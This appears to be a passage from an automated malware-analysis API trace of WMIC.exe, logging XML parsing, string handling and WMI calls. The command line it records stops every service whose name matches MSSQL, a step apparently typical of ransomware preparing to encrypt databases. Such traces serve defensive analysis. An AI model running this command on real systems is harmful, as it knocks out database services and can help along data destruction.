This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.161] malloc (_Size=0x18) returned 0x36c960 [0205.161] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.161] free (_Block=0x36c960) [0205.161] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0205.161] malloc (_Size=0x18) returned 0x36c960 [0205.161] malloc (_Size=0x18) returned 0x36c980 [0205.161] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0205.161] SysStringLen (param_1="TABLE") returned 0x5 [0205.161] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0205.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.161] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0205.161] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.161] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0205.161] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0205.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.161] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0205.161] malloc (_Size=0x30) returned 0x3684c0 [0205.162] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.162] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.162] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.162] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=18, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.162] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="mof.xsl") returned 0x0 [0205.162] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.162] malloc (_Size=0x18) returned 0x36c9a0 [0205.162] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.162] free (_Block=0x36c9a0) [0205.162] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0205.162] malloc (_Size=0x18) returned 0x36c9a0 [0205.162] malloc (_Size=0x18) returned 0x36c9c0 [0205.162] SysStringLen (param_1="wmiclimofformat") returned 0xf [0205.162] SysStringLen (param_1="TABLE") returned 0x5 [0205.162] SysStringLen (param_1="wmiclimofformat") returned 0xf [0205.162] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.162] SysStringLen (param_1="wmiclimofformat") returned 0xf [0205.162] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.162] SysStringLen (param_1="wmiclimofformat") returned 0xf [0205.162] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0205.162] SysStringLen (param_1="wmiclimofformat") returned 0xf [0205.162] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0205.162] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.162] SysStringLen (param_1="wmiclimofformat") returned 0xf [0205.162] malloc (_Size=0x30) returned 0x368500 [0205.162] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.162] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.163] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.163] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=19, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.163] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="textvaluelist.xsl") returned 0x0 [0205.163] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.163] malloc (_Size=0x18) returned 0x36c9e0 [0205.163] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.163] free (_Block=0x36c9e0) [0205.163] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0205.163] malloc (_Size=0x18) returned 0x36c9e0 [0205.163] malloc (_Size=0x18) returned 0x36ca00 [0205.163] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0205.163] SysStringLen (param_1="TABLE") returned 0x5 [0205.163] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0205.163] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.163] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0205.163] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.163] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0205.163] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0205.163] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0205.163] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0205.163] malloc (_Size=0x30) returned 0x368540 [0205.164] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.164] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.164] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.164] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=20, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.164] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="textvaluelist.xsl") returned 0x0 [0205.164] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.164] malloc (_Size=0x18) returned 0x36ca20 [0205.164] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.164] free (_Block=0x36ca20) [0205.164] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0205.164] malloc (_Size=0x18) returned 0x36ca20 [0205.164] malloc (_Size=0x18) returned 0x36ca40 [0205.164] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0205.164] SysStringLen (param_1="TABLE") returned 0x5 [0205.164] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0205.164] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.164] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0205.164] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.164] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0205.164] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0205.164] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0205.165] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0205.165] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0205.165] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0205.165] malloc (_Size=0x30) returned 0x368580 [0205.165] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.165] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.165] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.165] IUnknown:Release (This=0x22e9cc0) returned 0x0 [0205.165] FreeThreadedDOMDocument:IUnknown:Release (This=0x22ebc50) returned 0x1 [0205.165] FreeThreadedDOMDocument:IUnknown:Release (This=0x22e71d0) returned 0x0 [0205.165] free (_Block=0x366f00) [0205.165] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice" [0205.165] malloc (_Size=0xd0) returned 0x36cd30 [0205.165] memcpy_s (in: _Destination=0x36cd30, _DestinationSize=0xce, _Source=0xb25ee, _SourceSize=0xcc | out: _Destination=0x36cd30) returned 0x0 [0205.165] malloc (_Size=0x18) returned 0x36ca60 [0205.165] malloc (_Size=0x18) returned 0x36ca80 [0205.165] malloc (_Size=0x18) returned 0x36caa0 [0205.165] malloc (_Size=0x18) returned 0x36cac0 [0205.165] malloc (_Size=0x80) returned 0x366f00 [0205.166] GetLocalTime (in: lpSystemTime=0x24f6d0 | out: lpSystemTime=0x24f6d0*(wYear=0x7e4, wMonth=0x5, wDayOfWeek=0x5, wDay=0x8, wHour=0x14, wMinute=0x26, wSecond=0x30, wMilliseconds=0x1db)) [0205.166] _vsnwprintf (in: _Buffer=0x366f00, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x24f628 | out: _Buffer="05-08-2020T20:38:48") returned 19 [0205.166] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.166] malloc (_Size=0x88) returned 0x36ce10 [0205.166] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.166] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.166] malloc (_Size=0x88) returned 0x36cea0 [0205.166] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.166] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.166] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.166] malloc (_Size=0xa) returned 0x36cae0 [0205.166] lstrlenW (lpString="path") returned 4 [0205.166] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0205.166] malloc (_Size=0xa) returned 0x36cb00 [0205.166] malloc (_Size=0x8) returned 0x366f90 [0205.166] free (_Block=0x0) [0205.166] free (_Block=0x36cae0) [0205.166] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.166] malloc (_Size=0x1c) returned 0x367110 [0205.166] lstrlenW (lpString="Win32_Service") returned 13 [0205.166] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0205.166] malloc (_Size=0x1c) returned 0x36cf30 [0205.166] malloc (_Size=0x10) returned 0x36cae0 [0205.166] memmove_s (in: _Destination=0x36cae0, _DestinationSize=0x8, _Source=0x366f90, _SourceSize=0x8 | out: _Destination=0x36cae0) returned 0x0 [0205.166] free (_Block=0x366f90) [0205.167] free (_Block=0x0) [0205.167] free (_Block=0x367110) [0205.167] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.167] malloc (_Size=0xc) returned 0x36cb20 [0205.167] lstrlenW (lpString="where") returned 5 [0205.167] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0205.167] malloc (_Size=0xc) returned 0x36cb40 [0205.167] malloc (_Size=0x18) returned 0x36cb60 [0205.167] memmove_s (in: _Destination=0x36cb60, _DestinationSize=0x10, _Source=0x36cae0, _SourceSize=0x10 | out: _Destination=0x36cb60) returned 0x0 [0205.167] free (_Block=0x36cae0) [0205.167] free (_Block=0x0) [0205.167] free (_Block=0x36cb20) [0205.167] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.167] malloc (_Size=0x30) returned 0x3685c0 [0205.167] lstrlenW (lpString="\"name like '%%MSSQL%%'\"") returned 23 [0205.167] _wcsicmp (_String1="\"name like '%%MSSQL%%'\"", _String2="\"NULL\"") returned -20 [0205.167] lstrlenW (lpString="\"name like '%%MSSQL%%'\"") returned 23 [0205.167] lstrlenW (lpString="\"name like '%%MSSQL%%'\"") returned 23 [0205.167] malloc (_Size=0x30) returned 0x368600 [0205.167] malloc (_Size=0x20) returned 0x367110 [0205.167] memmove_s (in: _Destination=0x367110, _DestinationSize=0x18, _Source=0x36cb60, _SourceSize=0x18 | out: _Destination=0x367110) returned 0x0 [0205.167] free (_Block=0x36cb60) [0205.167] free (_Block=0x0) [0205.167] free (_Block=0x3685c0) [0205.167] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.167] malloc (_Size=0xa) returned 0x36cb60 [0205.167] lstrlenW (lpString="call") returned 4 [0205.167] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0205.168] malloc (_Size=0xa) returned 0x36cb20 [0205.168] malloc (_Size=0x30) returned 0x3685c0 [0205.168] memmove_s (in: _Destination=0x3685c0, _DestinationSize=0x20, _Source=0x367110, _SourceSize=0x20 | out: _Destination=0x3685c0) returned 0x0 [0205.168] free (_Block=0x367110) [0205.168] free (_Block=0x0) [0205.168] free (_Block=0x36cb60) [0205.168] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0205.168] malloc (_Size=0x18) returned 0x36cb60 [0205.168] lstrlenW (lpString="stopservice") returned 11 [0205.168] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0205.168] malloc (_Size=0x18) returned 0x36cae0 [0205.168] free (_Block=0x0) [0205.168] free (_Block=0x36cb60) [0205.168] malloc (_Size=0x30) returned 0x368640 [0205.168] lstrlenW (lpString="QUIT") returned 4 [0205.168] lstrlenW (lpString="path") returned 4 [0205.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0205.168] lstrlenW (lpString="EXIT") returned 4 [0205.168] lstrlenW (lpString="path") returned 4 [0205.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0205.168] free (_Block=0x368640) [0205.168] WbemLocator:IUnknown:AddRef (This=0x1e41390) returned 0x2 [0205.168] malloc (_Size=0x30) returned 0x368640 [0205.169] lstrlenW (lpString="/") returned 1 [0205.169] lstrlenW (lpString="path") returned 4 [0205.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0205.169] lstrlenW (lpString="-") returned 1 [0205.169] lstrlenW (lpString="path") returned 4 [0205.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0205.169] lstrlenW (lpString="CLASS") returned 5 [0205.169] lstrlenW (lpString="path") returned 4 [0205.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0205.169] lstrlenW (lpString="PATH") returned 4 [0205.169] lstrlenW (lpString="path") returned 4 [0205.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0205.169] lstrlenW (lpString="/") returned 1 [0205.169] lstrlenW (lpString="Win32_Service") returned 13 [0205.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0205.169] lstrlenW (lpString="-") returned 1 [0205.169] lstrlenW (lpString="Win32_Service") returned 13 [0205.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0205.169] lstrlenW (lpString="Win32_Service") returned 13 [0205.169] malloc (_Size=0x1c) returned 0x367110 [0205.169] lstrlenW (lpString="Win32_Service") returned 13 [0205.170] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0205.170] lstrlenW (lpString="Win32_Service") returned 13 [0205.170] malloc (_Size=0x1c) returned 0x36cf60 [0205.170] lstrlenW (lpString="Win32_Service") returned 13 [0205.170] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffee05d0 | out: _String=0x0, _Context=0xffffffffffee05d0) returned 0x0 [0205.170] lstrlenW (lpString="") returned 0 [0205.170] lstrlenW (lpString="WHERE") returned 5 [0205.170] lstrlenW (lpString="where") returned 5 [0205.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0205.170] lstrlenW (lpString="/") returned 1 [0205.170] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0205.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MSSQL%%'", cchCount1=21, lpString2="/", cchCount2=1) returned 3 [0205.170] lstrlenW (lpString="-") returned 1 [0205.170] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0205.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MSSQL%%'", cchCount1=21, lpString2="-", cchCount2=1) returned 3 [0205.170] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0205.170] malloc (_Size=0x2c) returned 0x368680 [0205.170] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0205.170] lstrlenW (lpString="/") returned 1 [0205.170] lstrlenW (lpString="call") returned 4 [0205.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0205.170] lstrlenW (lpString="-") returned 1 [0205.170] lstrlenW (lpString="call") returned 4 [0205.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0205.171] lstrlenW (lpString="call") returned 4 [0205.171] malloc (_Size=0xa) returned 0x36cb60 [0205.171] lstrlenW (lpString="call") returned 4 [0205.171] lstrlenW (lpString="GET") returned 3 [0205.171] lstrlenW (lpString="call") returned 4 [0205.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0205.171] lstrlenW (lpString="LIST") returned 4 [0205.171] lstrlenW (lpString="call") returned 4 [0205.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0205.171] lstrlenW (lpString="SET") returned 3 [0205.171] lstrlenW (lpString="call") returned 4 [0205.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0205.171] lstrlenW (lpString="CREATE") returned 6 [0205.171] lstrlenW (lpString="call") returned 4 [0205.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0205.171] lstrlenW (lpString="CALL") returned 4 [0205.171] lstrlenW (lpString="call") returned 4 [0205.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0205.171] lstrlenW (lpString="/") returned 1 [0205.171] lstrlenW (lpString="stopservice") returned 11 [0205.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0205.172] lstrlenW (lpString="-") returned 1 [0205.172] lstrlenW (lpString="stopservice") returned 11 [0205.172] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0205.172] lstrlenW (lpString="stopservice") returned 11 [0205.172] malloc (_Size=0x18) returned 0x36cb80 [0205.172] lstrlenW (lpString="stopservice") returned 11 [0205.172] ??0CHString@@QEAA@XZ () returned 0x24d278 [0205.172] GetCurrentThreadId () returned 0x2ac [0205.222] GetCurrentThreadId () returned 0x2ac [0205.222] ??0CHString@@QEAA@XZ () returned 0x24d048 [0205.222] malloc (_Size=0x8) returned 0x367140 [0205.222] malloc (_Size=0x18) returned 0x36cba0 [0205.222] malloc (_Size=0x18) returned 0x36cbc0 [0205.222] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e41390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff1c2950 | out: ppNamespace=0xff1c2950*=0x1e53a98) returned 0x0 [0205.320] free (_Block=0x36cbc0) [0205.320] CoSetProxyBlanket (pProxy=0x1e53a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0205.321] free (_Block=0x367140) [0205.321] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0205.321] free (_Block=0x36cba0) [0205.321] malloc (_Size=0x18) returned 0x36cba0 [0205.321] IWbemServices:GetObject (in: This=0x1e53a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x24d258*=0x0, ppCallResult=0x0 | out: ppObject=0x24d258*=0x1e7bfa0, ppCallResult=0x0) returned 0x0 [0207.168] free (_Block=0x36cba0) [0207.168] IWbemClassObject:BeginMethodEnumeration (This=0x1e7bfa0, lEnumFlags=0) returned 0x0 [0207.168] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="StartService", ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x1e7c4a0) returned 0x0 [0207.168] lstrlenW (lpString="StartService") returned 12 [0207.168] lstrlenW (lpString="stopservice") returned 11 [0207.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0207.169] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0207.169] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="StopService", ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x1e7c4a0) returned 0x0 [0207.169] lstrlenW (lpString="StopService") returned 11 [0207.169] lstrlenW (lpString="stopservice") returned 11 [0207.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0207.169] malloc (_Size=0x70) returned 0x36cf90 [0207.169] ??0CHString@@QEAA@XZ () returned 0x24cc08 [0207.169] GetCurrentThreadId () returned 0x2ac [0207.169] IWbemClassObject:GetNames (in: This=0x1e7c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x24cc00 | out: pNames=0x24cc00*="\x01ƀ\x08") returned 0x0 [0207.169] SafeArrayGetLBound (in: psa=0x154a90, nDim=0x1, plLbound=0x24cc18 | out: plLbound=0x24cc18) returned 0x0 [0207.169] SafeArrayGetUBound (in: psa=0x154a90, nDim=0x1, plUbound=0x24cc14 | out: plUbound=0x24cc14) returned 0x0 [0207.169] SafeArrayGetElement (in: psa=0x154a90, rgIndices=0x24cbf4, pv=0x24cbf8 | out: pv=0x24cbf8) returned 0x0 [0207.397] malloc (_Size=0x48) returned 0x36d010 [0207.397] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1e7c4a0, wszProperty="ReturnValue", ppQualSet=0x24ca48 | out: ppQualSet=0x24ca48*=0x1e413b0) returned 0x0 [0207.397] malloc (_Size=0x18) returned 0x36cba0 [0207.397] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="CIMTYPE", lFlags=0, pVal=0x24cad0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x24cad0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0207.397] free (_Block=0x36cba0) [0207.397] malloc (_Size=0x18) returned 0x36cba0 [0207.397] IWbemClassObject:Get (in: This=0x1e7c4a0, wszName="ReturnValue", lFlags=0, pVal=0x24cb78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x24ca58*=2411168, plFlavor=0x0 | out: pVal=0x24cb78*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x24ca58*=19, plFlavor=0x0) returned 0x0 [0207.397] malloc (_Size=0x18) returned 0x36cbc0 [0207.397] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="read", lFlags=0, pVal=0x24ca60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff1c2ac0), plFlavor=0x0 | out: pVal=0x24ca60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff1c2ac0), plFlavor=0x0) returned 0x80041002 [0207.398] free (_Block=0x36cbc0) [0207.398] malloc (_Size=0x18) returned 0x36cbc0 [0207.398] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="write", lFlags=0, pVal=0x24ca60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff1c2ac0), plFlavor=0x0 | out: pVal=0x24ca60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff1c2ac0), plFlavor=0x0) returned 0x80041002 [0207.398] free (_Block=0x36cbc0) [0207.398] malloc (_Size=0x18) returned 0x36cbc0 [0207.398] malloc (_Size=0x18) returned 0x36cbe0 [0207.398] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="Description", lFlags=0, pVal=0x24cb10*(varType=0x0, wReserved1=0x24, wReserved2=0x0, wReserved3=0x0, varVal1=0xff164293, varVal2=0x24cb18), plFlavor=0x0 | out: pVal=0x24cb10*(varType=0x0, wReserved1=0x24, wReserved2=0x0, wReserved3=0x0, varVal1=0xff164293, varVal2=0x24cb18), plFlavor=0x0) returned 0x80041002 [0207.398] free (_Block=0x36cbe0) [0207.398] malloc (_Size=0x18) returned 0x36cbe0 [0207.398] lstrlenA (lpString="Not Available") returned 13 [0207.398] malloc (_Size=0x1c) returned 0x36d060 [0207.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1522f0, cbMultiByte=-1, lpWideCharStr=0x36d060, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0207.398] free (_Block=0x36d060) [0207.398] IUnknown:Release (This=0x1e413b0) returned 0x0 [0207.398] malloc (_Size=0x48) returned 0x36d060 [0207.398] malloc (_Size=0x18) returned 0x36cc00 [0207.399] malloc (_Size=0x48) returned 0x36d0b0 [0207.399] malloc (_Size=0x70) returned 0x36d100 [0207.399] malloc (_Size=0x48) returned 0x36d180 [0207.399] free (_Block=0x36d0b0) [0207.399] free (_Block=0x36d060) [0207.399] free (_Block=0x36d010) [0207.399] free (_Block=0x36cbc0) [0207.399] free (_Block=0x36cbe0) [0207.399] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0207.399] IWbemClassObject:GetMethodQualifierSet (in: This=0x1e7bfa0, wszMethod="StopService", ppQualSet=0x24d178 | out: ppQualSet=0x24d178*=0x1e413b0) returned 0x0 [0207.399] malloc (_Size=0x18) returned 0x36cbe0 [0207.399] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="Implemented", lFlags=0, pVal=0x24d188*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x252350cd5621, varVal2=0xff1644fb), plFlavor=0x0 | out: pVal=0x24d188*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x252350cd5621, varVal2=0xff1644fb), plFlavor=0x0) returned 0x80041002 [0207.400] free (_Block=0x36cbe0) [0207.400] malloc (_Size=0x18) returned 0x36cbe0 [0207.400] malloc (_Size=0x18) returned 0x36cbc0 [0207.400] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="Description", lFlags=0, pVal=0x24d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff1c2948, varVal2=0x2ac), plFlavor=0x0 | out: pVal=0x24d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed 